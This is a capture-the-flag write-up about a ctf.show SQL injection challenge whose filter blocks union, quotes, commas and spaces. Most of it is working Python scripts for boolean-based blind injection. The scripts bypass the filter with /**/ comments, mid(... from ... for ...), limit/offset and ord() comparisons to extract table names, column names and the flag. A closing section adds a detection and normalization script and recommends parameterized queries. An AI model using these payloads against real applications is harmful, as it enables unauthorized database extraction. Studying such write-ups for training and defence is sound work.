Problem description
The challenge hint says this is a SQL injection problem.
Opening the challenge, the injection point is presumably the id parameter.
Testing shows that the challenge filters the union keyword, single quotes, commas and spaces.
Solution
1. With union filtered, union-based injection is out, so we try boolean-based blind injection instead.
2. With commas filtered, use mid(username from 1 for 1) in place of mid(username,1,1),
   and limit 1 offset 1 in place of limit 1,1.
3. With spaces filtered, use /**/ comments to get around it.
4. With single quotes filtered, we use ord() to convert the character under test to its ASCII code and compare numbers instead.
Now let's write a Python script to run it.
Getting the table names
    import requests

    chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"  # candidate characters to test
    url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"  # challenge URL

    for n in range(0, 2):  # enumerate the first two tables
        table_name = ''
        for i in range(1, 10):  # positions 1..9 of the name (we assume the table name is shorter than ten characters)
            for char in chars:  # try each candidate character at this position
                params = {
                    "id":
                    "-1/**/or/**/ord(mid((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/in/**/(database())/**/limit/**/1/**/offset/**/"+str(n)+")/**/from/**/"+str(i)+"/**/for/**/1))/**/in/**/("+str(ord(char))+")"
                }
                r = requests.get(url=url, params=params)
                # print(r.request.url)
                if "If" in r.text:  # the page behaves differently when the condition is true
                    table_name += char
                    break  # this position is known, move on to the next one
        print(table_name)
Getting the column names
    import requests

    chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"  # candidate characters to test
    url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"  # challenge URL

    for n in range(0, 1):  # first column only
        column_name = ''
        for i in range(1, 10):  # positions 1..9 of the column name
            for char in chars:
                params = {
                    "id":
                    "-1/**/or/**/ord(mid((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/in/**/(0x666c6167)/**/limit/**/1/**/offset/**/"+str(n)+")/**/from/**/"+str(i)+"/**/for/**/1))/**/in/**/("+str(ord(char))+")"
                }  # 0x666c6167 is the hex form of the table name "flag", which avoids the quotes
                r = requests.get(url=url, params=params)
                # print(r.request.url)
                if "If" in r.text:
                    column_name += char
                    break
        print(column_name)
Getting the column value
    import requests

    chars = "}{-0123456789abcdefghijklmnopqrstuvwxyz"  # candidate characters to test
    url = "http://f56a615a-e323-4905-a8a3-1818f9f454d9.challenge.ctf.show/index.php"  # challenge URL

    for n in range(0, 1):  # first row only
        value = ''
        for i in range(1, 50):  # positions 1..49 of the value
            for char in chars:
                params = {
                    "id":
                    "-1/**/or/**/ord(mid((select/**/flag/**/from/**/flag/**/limit/**/1/**/offset/**/"+str(n)+")/**/from/**/"+str(i)+"/**/for/**/1))/**/in/**/("+str(ord(char))+")"
                }
                r = requests.get(url=url, params=params)
                # print(r.request.url)
                if "If" in r.text:
                    value += char
                    break
        print(value)
Getting the flag
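The reason the challenge's blacklist fails is that it matches raw bytes (union, the quote, the comma, the space) rather than the structure of the query. The following is an added example, not part of the original writeup: it normalizes a request value the way a WAF or log triage rule should (URL-decode, treat /**/ as whitespace) and then matches the probe shapes the writeup uses (mid(... from ... for ...), ord(mid(...)), limit n offset m, information_schema). The sample id values are constructed here, not captured traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample values of the id parameter (not captured traffic); the
# third one has the shape of the probe used in this writeup.
SAMPLE_IDS = [
    "1",
    "-1 or 1=1",
    "-1/**/or/**/ord(mid((select/**/table_name/**/from/**/information_schema.tables"
    "/**/where/**/table_schema/**/in/**/(database())/**/limit/**/1/**/offset/**/0)"
    "/**/from/**/1/**/for/**/1))/**/in/**/(102)",
]

# The challenge's blacklist as the writeup describes it: union, ', comma, space.
NAIVE_BLACKLIST = ("union", "'", ",", " ")

def naive_filter_blocks(value: str) -> bool:
    """True if the writeup's byte-level blacklist would reject the raw value."""
    low = value.lower()
    return any(bad in low for bad in NAIVE_BLACKLIST)

def normalize(value: str) -> str:
    """URL-decode, turn inline comments into spaces, collapse whitespace, lowercase."""
    s = unquote_plus(value)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # /**/ stands in for a space
    s = re.sub(r"\s+", " ", s)
    return s.lower()

# Structural signatures that survive the comma/space/quote substitutions.
SIGNATURES = [
    re.compile(r"\binformation_schema\."),
    re.compile(r"\bmid\s*\(.*\bfrom\b.*\bfor\b"),  # mid(x from i for n)
    re.compile(r"\bord\s*\(\s*mid\s*\("),           # per-character ord(mid(...)) probe
    re.compile(r"\blimit\s+\d+\s+offset\s+\d+"),    # limit n offset m
    re.compile(r"\bor\s+\d+\s*=\s*\d+"),
]

def suspicious(value: str) -> bool:
    """True if the normalized value matches any injection signature."""
    s = normalize(value)
    return any(p.search(s) for p in SIGNATURES)

def triage(values):
    """Return (value, blocked_by_naive_filter, flagged_after_normalization) per input."""
    return [(v, naive_filter_blocks(v), suspicious(v)) for v in values]

if __name__ == "__main__":
    for v, blocked, flagged in triage(SAMPLE_IDS):
        print(f"blocked={blocked!s:5} flagged={flagged!s:5} {v[:60]}")
```

The third sample passes the naive filter untouched but is flagged once comments are normalized; the real fix for the application is a parameterized query, with this kind of rule serving as detection, not as the defence.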
Daily notes from a CTF beginner; comments from the experts are welcome.